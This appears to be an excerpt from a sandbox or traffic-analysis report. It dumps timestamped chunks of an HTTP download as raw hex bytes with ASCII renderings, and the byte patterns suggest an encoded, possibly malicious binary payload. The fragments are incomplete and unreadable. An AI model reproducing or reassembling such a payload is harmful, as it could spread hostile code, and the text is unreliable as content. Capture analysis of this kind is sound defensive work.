                                2022-06-26 07:42:48 UTC97INData Raw: 13 8b 66 20 17 8b 64 20 11 c6 5b 8b 66 58 15 af 20 c4 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 19 8b 64 20 11 c6 3f 8b 66 58 19 af 20 c6 ad 20 0d 8b 66 20 17 8b 64 20 13 8b 66 20 15 8b 64 20 11 5e 58 21 25 a3 33 30 ea 92 a2 0d e2 23 da da 34 66 1d c6 95 a5 58 0d 27 52 8f 0d 46 ca da da ea 92 ed ea 92 e0 09 e5 1c 25 06 ed 66 9c 2c 94 89 25 25 25 74 d2 d4 34 8b 46 e5 89 8b de 1d 8b 5e 18 09 e5 1c 25 25 9b 61 ea 92 a2 16 ed a3 10 8b 5e a2 89 c6 0a 0d 55 ca da da 66 1d a5 58 1b dc 50 37 8b 66 20 19 8b 64 20 11 8b 66 20 17 8b 64 20 13 c6 35 8b 66 20 19 8b 64 20 13 8b 66 20 17 8b 64 20 11 66 ae af e8 6c 0b 1c 25 66 eb 0d 3e 21 da da 66 ae 66 eb 0d 3b d6 da da a5 18 79 c2 1c 25 25 ea a9 8e 25 25 25 66 f0 b9 0b 1c 25 dd d5 cd 65 25 0d f4 c3 da da 60 e5 ea a9 76
                                Data Ascii: f d [fX f d f d ?fX f d f d ^X!%30#4fX'RF%f,%%%t4F^%%a^UfXP7f d f d 5f d f d fl%f>!ff;y%%%%%f%e%`v
                                2022-06-26 07:42:48 UTC99INData Raw: da da 66 9e 0d d4 b9 da da c6 e4 66 9e 66 fb 0d 77 b9 da da 83 36 66 c0 38 e7 29 25 66 e5 2e 7b 32 2c 66 b4 66 17 66 1d 8f 27 68 69 49 29 75 7b 32 0d 29 dd da da 60 e5 a3 e0 af 29 49 c6 27 66 9e 7f 3a 83 36 9e 30 66 11 2c 2e 7b 32 64 28 21 66 1f 66 15 66 38 2d 2e 66 20 35 66 65 21 0e a4 66 fb 0d 46 da da da 5e 16 25 50 e8 66 20 21 66 29 dd 66 ae 0d 58 d7 da da 3a 83 36 34 38 e7 2d 25 b5 30 66 11 0e a4 2c 2c 2c 2c 2c 2c 2e 7b 32 0e e5 30 8d 86 88 65 25 89 da 55 89 64 45 0d a2 92 da da 64 20 21 96 dc 25 25 25 e3 d5 0b 1c 25 9a 05 0b 1c 25 30 8f e6 68 20 19 75 94 b5 9c 1c 25 66 ae 6f 68 1e 69 6d 0d 54 da da da 34 66 30 19 66 eb 0d b3 6e da da 30 8f e6 68 20 15 75 94 e5 9c 1c 25 66 ae 6f 68 1e 5d 6d 0d 7b da da da 34 66 30 15 66 a2 0d 46 6e da da 1e 5e a2 29
                                Data Ascii: fffw6f8)%f.{2,fff'hiI)u{2)`)I'f:60f,.{2d(!fff8-.f 5fe!fF^%Pf !f)fX:648-%0f,,,,,,.{20e%UdEd !%%%%%0h u%fohimT4f0fn0h u%foh]m{4f0fFn^)
                                2022-06-26 07:42:48 UTC100INData Raw: 7b 0d a6 8e da da 5c 98 01 21 da da 25 35 25 25 50 41 8d e0 dc 25 25 68 60 0f d8 da da 75 66 60 f5 21 da da 75 0d 9a d7 da da 60 e5 50 fe 8d e0 dc 25 25 68 60 0f d8 da da 75 7c 8d 0b 1c 25 75 0d c9 d7 da da 66 eb 0d 68 da da da 64 20 19 c6 e4 06 90 f5 21 da da 64 50 19 68 60 0f d8 da da d7 81 0d b7 33 25 25 66 f5 67 68 60 ca 23 da da 94 29 dc 25 25 0d 22 ae da da dd 09 d7 65 25 64 20 21 dd 09 d7 65 25 64 20 1d 66 9e 66 f0 d5 4a 65 25 0d 53 a9 da da a9 e5 99 04 66 1e 29 0d fb b7 da da 64 20 21 66 20 21 0d c6 f7 da da 60 e5 99 37 66 30 21 a5 a1 27 da 53 99 2d dd 0d d7 65 25 64 20 1d 8d 25 dc 25 25 68 60 0f 21 da da 75 7c 5d f5 1c 25 66 65 29 75 7c 8d 0b 1c 25 0d d3 7c da da 75 0d 75 8e da da 68 70 c9 d6 da da 66 de 0d 8a 5c da da 68 60 c9 d6 da da 64 60 c9
                                Data Ascii: {\!%5%%PA%%h`uf`!u`P%%h`u|%ufhd !dPh`3%%fgh`#)%%"e%d !e%d ffJe%Sf)d !f !`7f0!'S-e%d %%%h`!u|]%fe)u|%|uuhpf\h`d`
                                2022-06-26 07:42:48 UTC101INData Raw: da da 66 20 21 64 20 09 eb 20 0d e6 64 50 11 eb 20 15 e6 64 58 19 eb 20 1d 25 68 20 09 75 8f 27 68 30 05 7c 0d aa 1c 25 0d f2 cd da da 66 28 05 d7 dc 7c fd 52 65 25 0d 11 21 da da 66 fd 0e e5 7f 34 34 89 64 35 8d 06 92 65 25 68 20 05 0d e8 64 da da 68 20 21 0d e0 64 da da 9e c4 36 a7 da da c6 0d 66 9e 3a 83 36 66 c0 38 9e 64 f1 64 39 49 66 48 25 c4 56 a7 da da 9e 66 e5 30 66 11 0d 61 da da da 68 28 2d 5e 9c 29 66 30 2d 0d ff da da da 38 e7 29 25 66 e5 66 e8 e1 f3 1c 25 d7 dc 7c 5d 9d 65 25 0d 23 21 da da 0d 20 a7 da da 9e 66 25 18 b7 25 25 e5 5a 51 99 34 18 b3 25 25 e5 5a f0 99 2e 08 e0 25 25 e5 99 30 08 62 25 25 25 99 61 6d 99 6d c6 30 e0 4c da da 1a 5e 0d 27 97 0e 99 12 c6 22 18 bb 25 25 e5 5a ec 99 10 08 6e 25 25 e5 99 4d 6d 99 ee 6d 99 3b c6 0a 08 d8
                                Data Ascii: f !d dP dX %h u'h0|%f(|Re%!f44d5e%h dh !d6f:6f8dd9IfH%Vf0fah(-^)f0-8)%ff%|]e%#! f%%%ZQ4%%Z.%%0b%%%amm0L^'"%%Zn%%Mmm;
                                2022-06-26 07:42:48 UTC103INData Raw: 94 a5 25 25 25 0d 48 ab da da 5c e9 b9 25 25 25 9e 66 e5 7b 32 66 1f 0e f7 60 e5 99 8b a5 61 5d 25 99 85 60 da 50 39 af 25 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 71 d7 dc c6 6d 66 d2 73 c6 dc 73 60 1b a1 37 af 31 55 5c bc da 25 25 25 ea 7e e8 3d 9c 1c 25 97 c4 66 aa 06 f3 5c bc dc 25 25 a5 54 e0 24 5e a4 23 1c 60 a4 50 29 d7 27 c6 ee af 29 5d 00 da 25 25 25 ea 7e e0 3d 9c 1c 25 4e 27 d7 dc 66 e7 3a 83 9e 68 65 25 2e 7b 66 17 66 fd 0e e5 a5 18 79 c2 1c 25 25 99 ea 66 9e 0d 49 ad da da 66 fb 6f 0d 8d da da da 83 36 9e b5 0e a4 a5 18 79 c2 1c 25 25 99 e2 0d 79 da da da 66 ed 66 9c 9e 68 65 25 2e 7b 66 17 66 fd 66 9e 0d ce 60 da da 16 15 a3 e4 66 9e 0d 0d 60 da da 66 15 66 fb 66 9e 0d e0 25 25 25 83 36 9e 66 e5 2e 7b 32 30 66 1f 66 15 0e c8 60 da a3 6b 66 eb
                                Data Ascii: %%%H\%%%f{2f`a]%`P9%%%%~=%Nqmfss`71U\%%%~=%f\%%T$^#`P)')]%%%~=%N'f:he%.{ffy%%fIfo6y%%yffhe%.{fff`f`fff%%%6f.{20ff`kf
                                2022-06-26 07:42:48 UTC104INData Raw: 7c 6d c2 1c 25 0d 99 da da da 75 0d 9b c7 da da 0e 1b c6 04 af 69 12 2b af 81 12 e2 4f fd 97 3f 1e ad 20 da af 20 da 00 da 25 25 25 ea 86 e0 3d 9c 1c 25 23 20 da 23 a6 50 0f 5e eb 27 5e 23 31 58 2f af 69 12 2b 2f 69 12 e2 50 ed 3a 83 36 34 38 9e 7c 71 c2 1c 25 5e 1d fa 52 e2 ea 7e e0 35 9e 1c 25 ea b7 e5 9e 68 65 25 30 66 11 5c e9 89 23 da da 2e 7b 32 a2 e0 6d c2 1c 25 e4 29 25 25 a2 e0 71 c2 1c 25 e4 25 25 25 a2 e0 75 c2 1c 25 dc 25 25 25 0d 48 c7 da da 60 e5 99 e0 7e 6d c2 1c 25 8b 60 e5 99 f6 66 f5 8b 5c 07 da de ea 92 f7 64 f0 71 c2 1c 25 ea 92 e5 9c 0d 2f 7e 75 c2 1c 25 e3 61 9e 65 25 9a 3d 9c 1c 25 94 2d 25 25 25 ce 80 5e 18 f5 e5 1c 25 27 ea 60 88 25 25 25 0d 48 da da da a9 e5 99 ee eb e0 30 c2 1c 25 25 eb e0 79 c2 1c 25 25 c4 9a 25 25 25 30 0d 15
                                Data Ascii: |m%ui+O? %%%=%# #P^'^#1X/i+/iP:648|q%^R~5%he%0f\#.{2m%)%%q%%%%u%%%%H`~m%`f\dq%/~u%ae%=%-%%%^%'`%%%H0%%y%%%%%0
                                2022-06-26 07:42:48 UTC105INData Raw: 25 da 00 59 ce 1c 25 66 e5 30 66 11 5e e9 11 2e 0e e5 64 20 11 0e e5 30 8d 91 a2 65 25 89 da 55 89 64 45 0d 20 78 da da 66 fd 60 b6 99 12 64 38 15 eb 20 19 25 68 30 11 66 9e 0d af 09 da da 66 20 11 64 20 1d eb 20 21 e6 68 20 15 75 8f dc 66 e8 cd aa 1c 25 d7 dc 7c 15 9d 65 25 0d 9d c8 da da 66 f5 c6 39 66 e8 45 f5 1c 25 d7 dc 7c 15 9d 65 25 0d 4b c8 da da 66 f5 64 7f 31 66 e7 0d 8b 97 da da 0e e5 7f 34 34 89 64 35 8d 4e a2 65 25 68 20 11 0d 98 9d da da 9e c4 ee 97 da da c6 15 36 66 c0 38 9e 2e 66 fd 60 b6 50 e0 0d 7d da da da 66 9e 36 9e 2e 7b 2c 96 39 9e 1c 25 66 19 c6 3b 66 de 64 2b 66 2b 66 25 64 de df 2d 25 25 25 66 2b 0d 5f 87 da da 5e 16 25 50 c0 7f 83 36 9e b5 2e 8d 11 a2 65 25 0d 7c c1 da da 66 fd 60 b6 99 35 8d 21 a2 65 25 2e 0d bd c1 da da 7e 61
                                Data Ascii: %Y%f0f^.d 0e%UdE xf`d8 %h0ff d !h uf%|e%f9fE%|e%Kfd1f44d5Ne%h 6f8.f`P}f6.{,9%f;fd+f+f%d-%%%f+_^%P6.e%|f`5!e%.~a
                                2022-06-26 07:42:48 UTC107INData Raw: da da 66 29 49 da 6d 31 66 29 49 5e 9d 31 25 50 6d 66 f9 66 1e 45 0d e4 d8 da da 0d e9 72 da da 16 1e 49 99 59 68 1e 31 0d 92 d6 da da 66 ed 5c d4 da da 25 25 50 e4 66 9e 0d 43 23 da da c6 f4 60 a4 5a f0 66 9c 94 da da 25 25 74 d2 d4 60 f7 50 e2 66 9e 0d de 23 da da 7f 36 9e 66 35 0e a4 64 2d 66 e7 0d e2 8d da da 9e 66 e5 30 66 11 5e e9 19 2e 66 fd 77 0d 2c bd da da 64 20 19 0e e5 30 8d 2f a8 65 25 89 da 55 89 64 45 b4 58 23 0e e5 30 8d 11 f1 65 25 89 da 55 89 64 45 66 9e 0d 3d 9d da da 75 0d ef 72 da da 64 20 1d 0e e5 7f 34 34 89 64 35 8d ce f1 65 25 b6 07 b4 48 23 9e c4 6e 91 da da c6 ce 0e e5 7f 34 34 89 64 35 8d ec a8 65 25 66 20 19 75 0d ca 72 da da 9e c4 50 91 da da c6 ca 66 20 1d 36 66 c0 38 9e 68 65 25 f8 25 25 25 31 9e 1c 25 b1 aa 1c 25 29 9e 1c
                                Data Ascii: f)Im1f)I^1%PmffErIYh1f\%%PfC#`Zf%%t`Pf#6f5d-ff0f^.fw,d 0/e%UdEX#0e%UdEf=urd 44d5e%H#n44d5e%f urPf 6f8he%%%%1%%)
                                2022-06-26 07:42:48 UTC108INData Raw: 65 dd 41 a8 65 25 0d 45 91 da da dd 2d f3 65 25 0d 63 91 da da a5 18 40 0b 1c 25 25 99 ea dd 5d 9c 1c 25 df 0d ac 65 25 0d ef 93 da da 0d e4 c4 da da 0d 2d 0f da da 0d ce d0 da da 0d bb cc da da 0e e5 7f 34 34 89 64 35 8d b6 ac 65 25 9e c4 86 42 da da c6 1d 38 9e 25 25 25 da da da da 27 25 25 25 55 9d 25 25 2e 7b 66 17 66 fd 16 ce 58 33 66 9e 06 eb 0d b4 81 da da de eb 83 36 9e 66 eb 06 9e 0d a6 81 da da de 9e 83 36 9e 66 e5 30 66 11 0e e5 30 8d 14 f7 65 25 89 da 55 89 64 45 da e0 cd c2 1c 25 0e e5 7f 34 34 89 64 35 8d 65 f7 65 25 9e c4 6b 42 da da c6 1d 38 9e 66 e5 5e 08 cd c2 1c 25 dc 9e 30 66 11 0e e5 30 8d 4c f7 65 25 89 da 55 89 64 45 da e0 d1 c2 1c 25 0e e5 7f 34 34 89 64 35 8d 9d f7 65 25 9e c4 33 42 da da c6 1d 38 9e 66 e5 5e 08 d1 c2 1c 25 dc 9e
                                Data Ascii: eAe%E-e%c@%%]%e%-44d5e%B8%%%'%%%U%%.{ffX3f6f6f0f0e%UdE%44d5ee%kB8f^%0f0Le%UdE%44d5e%3B8f^%
                                2022-06-26 07:42:48 UTC110INData Raw: 15 66 9e 36 34 38 e7 35 25 b5 da 00 6d ce 1c 25 66 e5 da 00 69 ce 1c 25 66 e5 da 00 65 ce 1c 25 66 e5 da 00 61 ce 1c 25 66 e5 30 66 11 2c 2e 7b 66 ff 66 15 64 38 21 66 20 2d 5e 9d 21 25 99 f4 7b 66 20 2d 66 65 21 75 0d 18 68 da da 64 20 21 5e 58 21 25 50 de 64 38 21 66 20 21 83 36 34 38 9e b5 30 66 11 2c 8d 5d b4 65 25 0d 37 68 da da 64 20 21 30 df c9 f7 65 25 dd 6d b4 65 25 0d 82 da da da 34 7e d5 c2 1c 25 30 df f9 f7 65 25 dd 81 b4 65 25 0d 6c da da da 34 7e d9 c2 1c 25 30 df f9 f7 65 25 dd 89 b4 65 25 0d 56 da da da 34 7e dd c2 1c 25 30 df 05 f7 65 25 dd 91 b4 65 25 0d 40 da da da 34 7e e1 c2 1c 25 30 df 05 f7 65 25 dd 99 b4 65 25 0d 2a da da da 34 7e e5 c2 1c 25 30 df 05 f7 65 25 dd a1 b4 65 25 0d 14 da da da 34 7e e9 c2 1c 25 30 df 05 f7 65 25 dd a9
                                Data Ascii: f6485%m%fi%fe%fa%f0f,.{ffd8!f -^!%{f -fe!uhd !^X!%Pd8!f !6480f,]e%7hd !0e%me%4~%0e%e%l4~%0e%e%V4~%0e%e%@4~%0e%e%*4~%0e%e%4~%0e%
                                2022-06-26 07:42:48 UTC111INData Raw: 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 79 54 95 40 1e 3c 4e 99 20 97 97 4a 97 66 e5 e1 01 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 e1 01 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 2a 9b 40 97 8b 91 4a 52 20 97 97 4a 97 66 e5 45 b8 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 45 b8 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f2 20 7b 3c 97 44 3c 93 99 24 93 9b 3c 91 44 89 1c 97 42 20 97 97
                                Data Ascii: %[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<yT@<N Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<*@JR JfEe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Ee%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<$<DB
                                2022-06-26 07:42:48 UTC115INData Raw: 25 68 20 21 0d c2 34 da da 9e c4 94 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d 37 c8 65 25 89 da 55 89 64 45 68 20 21 0d d3 53 25 25 66 9e 66 30 21 0d e9 63 25 25 0e e5 7f 34 34 89 64 35 8d f4 c8 65 25 68 20 21 0d f2 2e da da 9e c4 48 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d 83 c8 65 25 89 da 55 89 64 45 68 20 21 0d 3f 61 25 25 66 9e 66 30 21 0d 2d 1a 25 25 0e e5 7f 34 34 89 64 35 8d 40 c8 65 25 68 20 21 0d f6 48 da da 9e c4 fc 71 da da c6 15 36 34 38 9e 68 65 25 30 66 11 8f 25 2e 66 fd 0e e5 30 8d cf c8 65 25 89 da 55 89 64 45 68 20 21 0d 27 16 25 25 66 9e 66 30 21 0d b5 63 25 25 0e e5 7f 34 34 89 64 35 8d 8c c8 65 25 68 20 21 0d aa 91 da da 9e c4 b0 26 da da c6 15 36 34 38 9e 68 65 25 2e 7b 32
                                Data Ascii: %h !4q648he%0f%.f07e%UdEh !S%%ff0!c%%44d5e%h !.Hq648he%0f%.f0e%UdEh !?a%%ff0!-%%44d5@e%h !Hq648he%0f%.f0e%UdEh !'%%ff0!c%%44d5e%h !&648he%.{2
                                2022-06-26 07:42:48 UTC119INData Raw: da 57 89 64 47 66 20 21 8b 66 25 ea 92 f5 5e 1f 39 ea 62 a6 dc 25 25 da 49 70 3a d8 65 25 8e d8 65 25 eb d8 65 25 ca d8 65 25 27 23 65 25 39 23 65 25 4f 23 65 25 65 23 65 25 81 23 65 25 97 23 65 25 35 da 65 25 fe da 65 25 60 23 65 25 1f 23 65 25 35 da 65 25 fe da 65 25 fe da 65 25 bd 23 65 25 86 23 65 25 9a 23 65 25 ae 23 65 25 0b 23 65 25 a2 20 15 25 25 25 25 a2 20 19 25 25 25 25 c4 8d de 25 25 a5 18 45 9e 1c 25 25 99 e8 8b df 39 25 8b dd dc 25 0d 01 07 da da a2 20 15 25 25 25 25 a2 20 19 25 25 25 25 c4 1a de 25 25 66 20 21 ea 9a 65 2d 74 64 20 15 64 30 19 c4 51 de 25 25 66 20 21 66 65 2d 74 64 20 15 64 30 19 c4 3f de 25 25 66 20 21 b4 65 2d 0d a0 0a da da 64 20 15 64 30 19 c4 29 de 25 25 66 20 21 b8 65 2d 0d 8a 0a da da 64 20 15 64 30 19 c4 13 27 25 25
                                Data Ascii: WdGf !f%^9b%%Ip:e%e%e%e%'#e%9#e%O#e%e#e%#e%#e%5e%e%`#e%#e%5e%e%e%#e%#e%#e%#e%#e% %%%% %%%%%%E%%9%% %%%% %%%%%%f !e-td d0Q%%f !fe-td d0?%%f !e-d d0)%%f !e-d d0'%%
                                2022-06-26 07:42:48 UTC123INData Raw: 1c 25 c8 31 1c 25 c8 31 1c 25 c8 31 1c 25 b3 31 1c 25 c9 31 1c 25 92 31 1c 25 ef 31 1c 25 bc 31 1c 25 0e e5 64 20 1d c4 de dc 25 25 a5 18 45 9e 1c 25 25 99 e8 8b df 29 25 8b dd dc 25 0d 9b f9 da da 0e e5 64 20 1d c4 be 25 25 25 66 20 21 ba 65 2d b4 38 1d 76 c4 f9 25 25 25 66 20 21 b6 65 2d b4 38 1d 76 c4 a0 25 25 25 66 20 21 66 65 2d 64 20 1d c4 92 25 25 25 66 20 21 ea 9a 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c4 7c 25 25 25 66 20 21 ea e3 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c4 66 25 25 25 66 20 21 ea db 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c6 9d 66 20 21 ea 92 65 2d 64 20 19 b6 20 19 b4 38 1d 76 c6 40 66 20 21 66 65 2d 64 20 11 0e e5 64 20 15 ba 48 11 b4 38 1d 76 c6 73 66 20 21 ba 8d 2d b4 38 1d 76 c6 67 0e e5 30 8d ec e8 1c 25 89 da 55 89 64 45 66 20 21 0d
                                Data Ascii: %1%1%1%1%1%1%1%1%d %%E%%)%%d %%%f !e-8v%%%f !e-8v%%%f !fe-d %%%f !e-d 8v|%%%f !e-d 8vf%%%f !e-d 8vf !e-d 8v@f !fe-d d H8vsf !-8vg0%UdEf !
                                2022-06-26 07:42:48 UTC127INData Raw: 3c da da 66 30 1d 66 eb 0d 0f fe da da c4 c2 de 25 25 b4 1e 2d 5e e9 19 b6 61 49 76 68 20 19 0d 16 50 da da 66 30 19 66 eb 0d a4 fe da da c4 eb de 25 25 b8 1e 2d 5e e9 19 b6 61 49 76 68 20 15 0d 3f 50 da da 66 30 15 66 eb 0d cd fe da da c4 80 de 25 25 da 4e 31 da 4e 2d 68 20 11 0d ac d6 da da 66 30 11 66 eb 0d 9a 00 da da c4 ad de 25 25 da 4e 31 da 4e 2d 68 20 0d 0d 11 d6 da da 66 30 0d 66 eb 0d c7 00 da da c4 46 de 25 25 68 20 09 75 66 1e 2d 94 da da da 5a df dc 25 25 25 0d 5a 06 da da 66 30 09 66 eb 0d 58 00 da da c4 6b de 25 25 68 30 05 8b 66 1e 2d 0d 09 d6 da da 66 30 05 66 eb 0d 87 00 da da c4 06 de 25 25 68 30 01 ea e3 1e 2d 0d 64 85 da da 66 30 01 66 eb 0d ee fe da da c4 35 de 25 25 68 30 fd 0e e5 af 1e 2d 0d 48 85 da da 66 30 fd 66 eb 0d d2 47 da
                                Data Ascii: <f0f%%-^aIvh Pf0f%%-^aIvh ?Pf0f%%N1N-h f0f%%N1N-h f0fF%%h uf-Z%%%Zf0fXk%%h0f-f0f%%h0-df0f5%%h0-Hf0fG
                                2022-06-26 07:42:48 UTC131INData Raw: 25 25 1e 50 97 97 40 93 3e 54 25 25 25 25 da da da da 29 25 25 25 69 3c 99 40 25 25 25 25 da da da da 2b 25 25 25 2a 91 40 2e 99 97 25 25 da da da da 2d 25 25 25 69 44 4e 95 3c 99 3e 8d 25 25 25 25 da da da da e0 25 25 25 20 97 97 4a 97 25 25 25 da da da da e2 25 25 25 67 4a 4a 91 40 3c 93 25 da da da da e2 25 25 25 7b 3c 97 44 3c 93 99 25 da da da da e2 25 25 25 30 93 46 93 4a 52 93 25 da da da da e2 25 25 25 69 40 3e 44 48 3c 91 25 da da da da de 25 25 25 49 55 6b 25 da da da da 2d 25 25 25 2e 8d 4a 97 99 24 93 99 25 25 25 25 da da da da 29 25 25 25 67 54 99 40 25 25 25 25 da da da da 29 25 25 25 32 4a 97 89 25 25 25 25 da da da da 2d 25 25 25 71 4a 93 42 32 4a 97 89 25 25 25 25 da da da da e0 25 25 25 24 93 99 5b 59 25 25 25 30 66 11 5c e9 1d d8 da da
                                Data Ascii: %%P@>T%%%%)%%%i<@%%%%+%%%*@.%%-%%%iDN<>%%%%%%% J%%%%%%gJJ@<%%%%{<D<%%%%0FJR%%%%i@>DH<%%%%IUk%-%%%.J$%%%%)%%%gT@%%%%)%%%2J%%%%-%%%qJB2J%%%%%%%$[Y%%%0f\
                                2022-06-26 07:42:48 UTC135INData Raw: 99 2d 68 30 d1 0d fe de 25 25 66 38 15 60 b6 99 41 26 68 d9 b8 d1 d8 da da 66 a3 29 60 da 99 e4 66 b2 66 2b 0d 0d 35 da da 60 b6 50 09 0e e5 7f 34 34 89 64 35 8d 0f 18 1c 25 66 38 15 60 b6 99 37 26 66 a9 b8 d1 d8 da da 75 0d fb 1b da da 60 b6 50 13 9e c4 c1 d6 23 da c6 ba 0e e5 7f 34 34 89 64 35 8d e8 63 1c 25 68 20 d1 66 f0 95 59 1c 25 0d f6 31 da da 9e c4 54 d6 23 da c6 0f 3a 83 36 66 c0 38 e7 2d 25 66 e5 30 66 11 5e e9 1d 66 20 2d 66 65 21 64 20 1d eb 20 21 2b 68 20 1d 75 8f 25 66 e8 e5 aa 1c 25 d7 dc 7c 85 10 1c 25 0d 44 9b da da 0d 99 d6 23 da 34 34 38 9e 30 66 11 5e e9 05 2e 7b 32 64 28 19 64 30 21 64 20 09 68 58 05 66 20 21 64 e2 0e 1b 64 40 1d 66 20 19 65 9c 05 27 04 e9 68 20 15 64 45 66 e2 0d ad 6b da da 66 fd 8f 25 8f 25 2e 66 e2 75 8f 25 8f 25
                                Data Ascii: -h0%%f8`A&hf)`ff+5`P44d5%f8`7&fu`P#44d5c%h fY%1T#:6f8-%f0f^f -fe!d !+h u%f%|%D#4480f^.{2d(d0!d hXf !dd@f e'h dEfkf%%.fu%%
                                2022-06-26 07:42:48 UTC139INData Raw: 50 95 4e b5 30 66 11 2c 2e 7b 32 a9 f7 99 2d 5e e9 15 0d a0 0d 23 da 66 d4 ad 30 da 66 fd 0e f7 66 9e 0d 0c 0b 23 da d7 dc 7c 59 6d 1c 25 0d 00 0b 23 da 64 1e 29 d7 dc 7c 19 6f 1c 25 0d 3b 0b 23 da 64 1e 2d d7 dc 7c 59 6d 1c 25 0d e2 0b 23 da 66 15 64 4e 31 66 eb 66 b2 0d a4 27 25 25 66 9e a5 58 da 25 99 ea 0d ed 0d 23 da 89 6a e0 25 25 25 25 5e e9 31 66 9e 3a 83 36 34 38 9e 66 e5 2e 7b 0d 98 0d 23 da 66 ff 66 15 66 ae a5 07 21 66 eb 0d bc c0 23 da 66 6b 29 0d c4 c0 23 da 66 6b 2d 0d bc c0 23 da 66 6b 31 0d b4 c0 23 da a9 b6 a3 e2 66 eb 0d 97 0d 23 da 83 36 9e 68 65 25 2e 7b 66 ff 66 15 60 b6 99 35 66 eb 0d 86 29 da da 16 fd 99 e0 0e e5 83 36 9e d5 dc 83 36 9e b5 2e 7b 32 66 1f 66 15 66 6b 31 66 7d 2d 26 5e d6 25 a1 00 66 ae 66 6b 31 0d 46 de 25 25 66 b2
                                Data Ascii: PN0f,.{2-^#f0ff#|Ym%#d)|o%;#d-|Ym%#fdN1ff'%%fX%#j%%%%^1f:648f.{#fff!f#fk)#fk-#fk1#f#6he%.{ff`5f)66.{2fffk1f}-&^%ffk1F%%f
                                2022-06-26 07:42:48 UTC143INData Raw: 35 8d 8a 83 1c 25 66 20 21 0d d0 b0 23 da 9e c4 b2 ff 23 da c6 15 83 34 38 9e b5 30 66 11 5e e9 1d 2e 7b 0e a4 64 28 1d 66 ff 64 20 21 0e e5 30 8d 2c 3a 1c 25 89 da 55 89 64 45 66 20 21 0d 61 d4 da da 0e e5 30 8d 59 3a 1c 25 89 da 55 89 64 45 66 9e 66 35 da 37 66 15 66 9e 0d 2a e6 25 25 06 15 68 20 1d 66 f3 0e f7 0d ec 07 23 da 66 30 1d 66 f3 66 9e 66 3d da 2e 31 66 30 1d 66 20 21 66 2d da 2c 51 0e e5 7f 34 34 89 64 35 8d 16 3a 1c 25 66 20 21 0d 7c d4 da da 9e c4 26 ff 23 da c6 15 0e e5 7f 34 34 89 64 35 8d 7d 3a 1c 25 68 20 1d 0d fd 05 23 da 9e c4 53 ff 23 da c6 15 83 36 34 34 38 9e 66 e5 30 66 11 5e e9 1d 2e 7b 32 0e b6 64 38 1d 66 cc 66 ff 64 20 21 0e e5 30 8d dc 85 1c 25 89 da 55 89 64 45 16 ce 99 89 66 20 21 0d 64 1d da da 0e e5 30 8d 09 3a 1c 25 89
                                Data Ascii: 5%f !##480f^.{d(fd !0,:%UdEf !a0Y:%UdEff57ff*%%h f#f0fff=.1f0f !f-,Q44d5:%f !|&#44d5}:%h #S#6448f0f^.{2d8ffd !0%UdEf !d0:%
                                2022-06-26 07:42:48 UTC148INData Raw: 30 1d 64 20 21 5e 18 b1 0d 1c 25 25 ea a9 ab 25 25 25 7c b1 0d 1c 25 0d 4b c0 da da 66 1d 0e e5 30 8d 8a 4a 1c 25 89 da 55 89 64 45 66 3a 2d 26 5e d6 25 a1 69 66 ae 66 a2 0d 45 be da da 66 15 5e 58 21 25 99 2d 66 6b 2d 16 20 21 50 00 5e 58 1d 25 99 ea 66 7b 35 66 20 1d 0d fe e8 da da a9 e5 99 35 66 ae 66 a2 0d 23 bc da da 66 eb 0d e6 a0 23 da 26 5e d6 da 50 e1 0e e5 7f 34 34 89 64 35 8d db 4a 1c 25 7c b1 0d 1c 25 0d eb 09 da da 9e c4 f5 a4 23 da c6 13 3a 83 36 34 34 38 9e 68 65 25 30 66 11 2c 2e 7b 32 64 20 21 5e 18 b1 0d 1c 25 25 99 46 7c b1 0d 1c 25 0d 5e 09 da da 66 1d 0e e5 30 8d 12 95 1c 25 89 da 55 89 64 45 66 3a 2d 26 5e d6 25 a1 04 66 ae 66 a2 0d 58 07 da da 66 15 66 6b 29 16 20 21 50 35 66 ae 66 a2 0d 9b bc da da 66 eb 0d 5e e9 23 da 26 5e d6 da
                                Data Ascii: 0d !^%%%%%|%Kf0J%UdEf:-&^%iffEf^X!%-fk- !P^X%f{5f 5ff#f#&^P44d5J%|%#:6448he%0f,.{2d !^%%F|%^f0%UdEf:-&^%ffXffk) !P5fff^#&^
